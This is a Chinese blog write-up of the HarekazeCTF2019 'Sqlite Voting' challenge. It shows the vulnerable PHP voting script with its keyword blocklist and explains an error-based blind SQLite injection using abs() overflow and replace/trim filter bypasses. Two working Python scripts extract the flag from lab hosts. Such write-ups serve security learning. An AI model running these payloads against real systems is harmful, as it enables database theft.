[HarekazeCTF2019]Sqlite Voting

于 2021-05-27 20:34:07 发布
阅读量451 收藏
点赞数 1
分类专栏: sql注入 # ctf做题记录 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/117336446
版权

在这里插入图片描述
看提示应该是sqlite注入
可以直接下载到数据库结构和源码

DROP TABLE IF EXISTS `vote`;
CREATE TABLE `vote` (
  `id` INTEGER PRIMARY KEY AUTOINCREMENT,
  `name` TEXT NOT NULL,
  `count` INTEGER
);
INSERT INTO `vote` (`name`, `count`) VALUES
  ('dog', 0),
  ('cat', 0),
  ('zebra', 0),
  ('koala', 0);

DROP TABLE IF EXISTS `flag`;
CREATE TABLE `flag` (
  `flag` TEXT NOT NULL
);
INSERT INTO `flag` VALUES ('HarekazeCTF{<redacted>}');

<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // dangerous chars
    // " % ' * + / < = > \ _ ` ~ -
    "[\"%'*+\\/<=>\\\\_`~-]",
    // whitespace chars
    '\s',
    // dangerous functions
    'blob', 'load_extension', 'char', 'unicode',
    '(in|sub)str', '[lr]trim', 'like', 'glob', 'match', 'regexp',
    'in', 'limit', 'order', 'union', 'join'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

header("Content-Type: text/json; charset=utf-8");

// check user input
if (!isset($_POST['id']) || empty($_POST['id'])) {
  die(json_encode(['error' => 'You must specify vote id']));
}
$id = $_POST['id'];
if (!is_valid($id)) {
  die(json_encode(['error' => 'Vote id contains dangerous chars']));
}

// update database
$pdo = new PDO('sqlite:../db/vote.db');
$res = $pdo->query("UPDATE vote SET count = count + 1 WHERE id = ${id}");
if ($res === false) {
  die(json_encode(['error' => 'An error occurred while updating database']));
}

// succeeded!
echo json_encode([
  'message' => 'Thank you for your vote! The result will be published after the CTF finished.'
]);

做了挺严格的过滤的。想不到怎么注,参考大佬的wp
wp
看完wp只能感叹方法总比困难多。
在这里插入图片描述
因为回显页面不一样,所以采用报错注入加盲注,等号被过滤,所以考虑先爆flag字段16进制的长度。
这里用的sqlite报错注入知识点
在 sqlite3 中,abs 函数有一个整数溢出的报错,如果 abs 的参数是 -9223372036854775808 就会报错,同样如果是正数也会报错
爆长度脚本

import requests

url = "http://574a587f-2192-41c6-bcae-d8808e91d8ee.node3.buuoj.cn/vote.php"
l = 0
for n in range(16):
    payload = f'abs(case(length(hex((select(flag)from(flag))))&{1<<n})when(0)then(0)else(0x8000000000000000)end)'
    data = {
        'id' : payload
    }

    r = requests.post(url=url, data=data)
    print(r.text)
    if 'occurred' in r.text:
        l = l|1<<n

print(l)

刚开始没看懂,实际操作了一下其实就是用&位运算统计长度转为2进制后1的位置,然后用或运算计入。
长度84
在这里插入图片描述
知道长度为84,但过滤了很多截取字符串的函数,这题用replace判断。下面的操作我肯定是想不到了,直接看参考的wp吧。
在这里插入图片描述
简单解释一下吧

abs(
    case(	#因为没有替换,when(trim(0,0))不匹配,则执行后面else语句abs(0x8000000000000000)从而报错
        replace(  #replace(得到的长度,84,''),若匹配到长度不为84则不替换,返回flase
            length(  #此时长度改变,不再为84
                replace( #若{t}包含在flag,则被替换为空。
                    hex(
                        (select(flag)from(flag))
                    ),{t},trim(0,0)
                )
            ),{l},trim(0,0)
        )
    )when(trim(0,0))then(0)else(0x8000000000000000)end
)

# coding: utf-8
import binascii
import requests
URL = 'http://1aa0d946-f0a0-4c60-a26a-b5ba799227b6.node2.buuoj.cn.wetolink.com:82/vote.php'


l = 0
i = 0
for j in range(16):
  r = requests.post(URL, data={
    'id': f'abs(case(length(hex((select(flag)from(flag))))&{1<<j})when(0)then(0)else(0x8000000000000000)end)'
  })
  if b'An error occurred' in r.content:
    l |= 1 << j
print('[+] length:', l)


table = {}
table['A'] = 'trim(hex((select(name)from(vote)where(case(id)when(3)then(1)end))),12567)'
table['C'] = 'trim(hex(typeof(.1)),12567)'
table['D'] = 'trim(hex(0xffffffffffffffff),123)'
table['E'] = 'trim(hex(0.1),1230)'
table['F'] = 'trim(hex((select(name)from(vote)where(case(id)when(1)then(1)end))),467)'
table['B'] = f'trim(hex((select(name)from(vote)where(case(id)when(4)then(1)end))),16||{table["C"]}||{table["F"]})'


res = binascii.hexlify(b'flag{').decode().upper()
for i in range(len(res), l):
  for x in '0123456789ABCDEF':
    t = '||'.join(c if c in '0123456789' else table[c] for c in res + x)
    r = requests.post(URL, data={
      'id': f'abs(case(replace(length(replace(hex((select(flag)from(flag))),{t},trim(0,0))),{l},trim(0,0)))when(trim(0,0))then(0)else(0x8000000000000000)end)'
    })
    if b'An error occurred' in r.content:
      res += x
      break
  print(f'[+] flag ({i}/{l}): {res}')
  i += 1
print('[+] flag:', binascii.unhexlify(res).decode())
fmyyy1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF--[HarekazeCTF2019]Sqlite Voting
qq_46263951的博客
08-16 423
进入后是一个投票界面 查看给出的源码, 在 vote.php 页面 POST 参数 id ,只能为数字。并且在 schema.sql 中发现了 flag 表. //vote.php if (!isset($_POST['id']) || empty($_POST['id'])) { die(json_encode(['error' => 'You must specify vote id'])); } $id = $_POST['id']; if (!is_valid($id)) { .
[HarekazeCTF2019]Sqlite Voting 记录
SopRomeo的博客
10-16 709
分析源代码,这边过滤了很多sql关键字 这是sqllite 的数据库,mysql的绕过也不可知,由于他过滤了" '所以无法判断是字符型还是整形, 题目前面还给了一段sql语句 可知flag在flag表里 看到这里很明显就要根据这个update来进行盲注 这边我的思路是用mid来代替substr(),我尝试采用异或,括号代替空格 无果,查了查了sqllite,好像没有^这个逻辑运算符,看wp了,对sqllite不熟 wp参考 发现sqllite abs可以弄个整数溢出 如果 abs 的参数是 -9223
[HarekazeCTF2019]Sqlite Voting 13
m0_50967960的博客
04-29 250
根据题目,判断考察方向针对sqlite的sql注入 攻击点 $id $id被进行了很多过滤 姿势1 https://ch4ser-go.github.io/2020/01/21/sql-injection-sqlite3/ 姿势2 http://blog.redrocket.club/2019/05/19/harekaze-ctf-sqlite-voting/
SQLite_Dll_forUnity2019.zip
10-17
支持Unity使用的SQLite动态链接库,dll打包后不报错 供64位windos使用,测试Unity2019.3.2版本可用
DB Browser for SQLite 3.11.1 win64 SQLite数据库查看工具 2019版
04-26
DB Browser for SQLite(DB4S) 是一个高质量、可视化、开源的工具,用于创建、设计和编辑与SQLite兼容的数据库文件。 为想要创建、搜索和编辑数据库的用户和开发人员而设计的。DB Browser for SQLite(DB4S) 使用一个...
vs2019 C# 对SQLite数据库的增删改查的代码实例
02-02
这是一个用C#实现的读写sqlite数据库的例子,希望能对正学习这一块的朋友有帮助。 需要使用System.Data.SQLite库 大至步骤如下: 在WinForms项目中添加一个数据库连接。你可以使用SQLiteConnection类来建立数据库...
uniAPP使用sqlite数据库demo
最新发布
04-01
uniAPP使用sqlite数据库demo
sqlite3.exe绿色版 下载
10-01
SQLite是一款轻型的数据库,它的设计目标是嵌入式的,而且目前已经在很多嵌入式产品中使用了它,它占用资源非常的低,在嵌入式设备中,可能只需要几百K的内存就够了。它能够支持Windows/Linux/Unix等等主流的操作...
CTF特训营》web部分读书笔记(一)SQL注入
闵行小鱼塘
07-25 1110
ctf特训营》的读书笔记,由于笔者现在关注web方向,所以主要是web部分,其余部分留待以后,本节是sql注入
【攻防世界】二十四 --- FlatScience --- SQLite注入
qq_43168364的博客
01-26 1273
题目 ---- FlatScience 一、writeup 二、知识点
[BSidesCF 2019]Sequel SQLite注入~~
a3320315的博客
02-15 1414
题目描述 首先是登录,我们爆破一下就好了~~ 然后得到用户名和密码均为guest~~ 这时登录成功后会返回一个cookie,而且长得很可疑~~ set-cookie: 1337_AUTH=eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9; HttpOnly base64 解密一下得到 {"username":"guest","passwor...
[网鼎杯2018]Unfinish
fmyyy1的博客
04-15 2151
场景 既然有login.php那就会有register.php,访问。 注册一个账号进去。 登录进去后看到我们的用户名了。 猜测在用户名处存在二次注入,再注册一个账号。 用户名变成了0,证明存在二次注入。 fuzz之后发现逗号,information等许多关键字被过滤了。 绕过方法: mysql中,+只能当做运算符。 执行select '1'+'1a'时 结果 执行select '0'+database(); 编程了0,但我们可以用ascii编码进行计算。 select '0'+ascii(
[HFCTF2020]EasyLogin
fmyyy1的博客
04-13 2001
对js不是很了解,这题边看wp边学。 是一个登录界面。 注册一个账号登录 flag没有显示,看源码。 看到了app.js,访问可看到源码。 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val(); const password = $("#password").val(); const token =
[极客大挑战 2020]Greatphp
fmyyy1的博客
05-22 1331
知识点 php原生类的利用 源码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
[GYCTF2020]Ezsqli
fmyyy1的博客
04-05 1255
查询界面,猜测sql注入,查询抓包 fuzz后发现information_schema,or,union等关键字被过滤了,应该是要无列名注入。 用^代替or id=0^(length(database())>1) 证明存在sql注入 InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列.
[WMCTF2020]Make PHP Great Again
fmyyy1的博客
05-25 1245
源码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 解法一 这一看就是session.upload_progress文件包含 import io import requests import threading sessid = 'bbbbbbb' data = {"cmd":"system('cat flag.ph
[HFCTF2020]JustEscape
fmyyy1的博客
04-13 1092
场景 最低行提示不是php,测试过后发现是nodejs。 是vm2的沙箱逃逸问题。 github上有现成的poc https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(
vs2019如何安装sqlite3
07-27
在 Visual Studio 2019 中安装 SQLite3,您可以按照以下步骤操作: 1. 打开 Visual Studio 2019,并在顶部菜单中选择 "工具"。 2. 在下拉菜单中选择 "NuGet 包管理器",然后选择 "程序包管理器控制台"。 3. 在打开...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值